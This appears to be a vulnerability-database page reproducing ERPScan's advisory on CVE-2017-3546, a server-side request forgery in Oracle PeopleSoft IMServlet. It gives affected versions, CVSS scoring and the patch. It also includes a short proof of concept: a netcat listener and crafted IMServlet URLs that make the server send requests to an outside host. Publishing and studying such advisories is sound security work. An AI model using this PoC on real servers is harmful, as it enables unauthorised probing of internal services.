Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtRoman Shalymov1337DAY-ID-27643
HistoryApr 20, 2017 - 12:00 a.m.

Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF Vulnerabilities

2017-04-2000:00:00
Roman Shalymov
0day.today
52

0.008 Low

EPSS

Percentile

82.2%

JSON

Oracle PeopleSoft ToolsRelease version 8.55.03, ToolsReleaseDB version 8.55, and HCM version 9.2 suffer from a server-side request forgery vulnerability.

Application: Oracle PeopleSoft
Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55;
PeopleSoft HCM 9.2
Vendor URL: http://oracle.com
Bugs: SSRF
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Roman Shalymov (ERPScan)

Description

1. ADVISORY INFORMATION

Title:[ERPSCAN-17-022] SSRF in PeopleSoft IMServlet
Advisory ID: [ERPSCAN-17-022]
Risk: high
CVE: CVE-2017-3546
Advisory URL: https://erpscan.com/advisories/erpscan-17-022-ssrf-peoplesoft-imservlet/
Date published: 18.04.2017
Vendors contacted: Oracle


2. VULNERABILITY INFORMATION

Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes

CVSS Information

CVSS Base Score v3:    8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)


3. VULNERABILITY DESCRIPTION

An attacker can force a vulnerable server to trigger malicious
requests to third-party servers or to internal resources. This
vulnerability can then be leveraged to launch specific attacks such as
a cross-site port attack, service enumeration, and various other
attacks.

4. VULNERABLE PACKAGES

ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2

5. SOLUTIONS AND WORKAROUNDS

To correct this vulnerability, implement Oracle CPU April 2017

6. AUTHOR

Roman Shalymov

7. TECHNICAL DESCRIPTION

PoC

Run netcat

1. nc -l -p # on some host

In browser open the following links

http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT

http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"


Read response in netcat

GET /?param=var HTTP/1.1

User-Agent: Java1.7.0_95

Host: SOMEHOST:OPEN_PORT

Accept: text/html, image/gif, image/jpeg, /; q=.2

Connection: Keep-Alive

#  0day.today [2018-04-06]  #

Related

cve 1
packetstorm 1
zdt 1
exploitpack 1
prion 1
cvelist 1
nvd 1
erpscan 1
exploitdb 1
oracle 1
cve
cve
CVE-2017-3546
2017-04-24 19:59:04
packetstorm
packetstorm
Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF
2017-04-20 00:00:00
zdt
zdt
Oracle PeopleSoft - Server-Side Request Forgery Vulnerability
2017-05-20 00:00:00
exploitpack
exploitpack
Oracle PeopleSoft - Server-Side Request Forgery
2017-05-19 00:00:00
prion
prion
Code injection
2017-04-24 19:59:00
cvelist
cvelist
CVE-2017-3546
2017-04-24 19:00:00
nvd
nvd
CVE-2017-3546
2017-04-24 19:59:04
erpscan
erpscan
SSRF in PeopleSoft IMServlet
2016-12-23 00:00:00
exploitdb
exploitdb
Oracle PeopleSoft - Server-Side Request Forgery
2017-05-19 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2017
2017-04-18 00:00:00

0.008 Low

EPSS

Percentile

82.2%

JSON
Related for 1337DAY-ID-27643
cve1packetstorm1zdt1exploitpack1prion1cvelist1nvd1erpscan1exploitdb1oracle1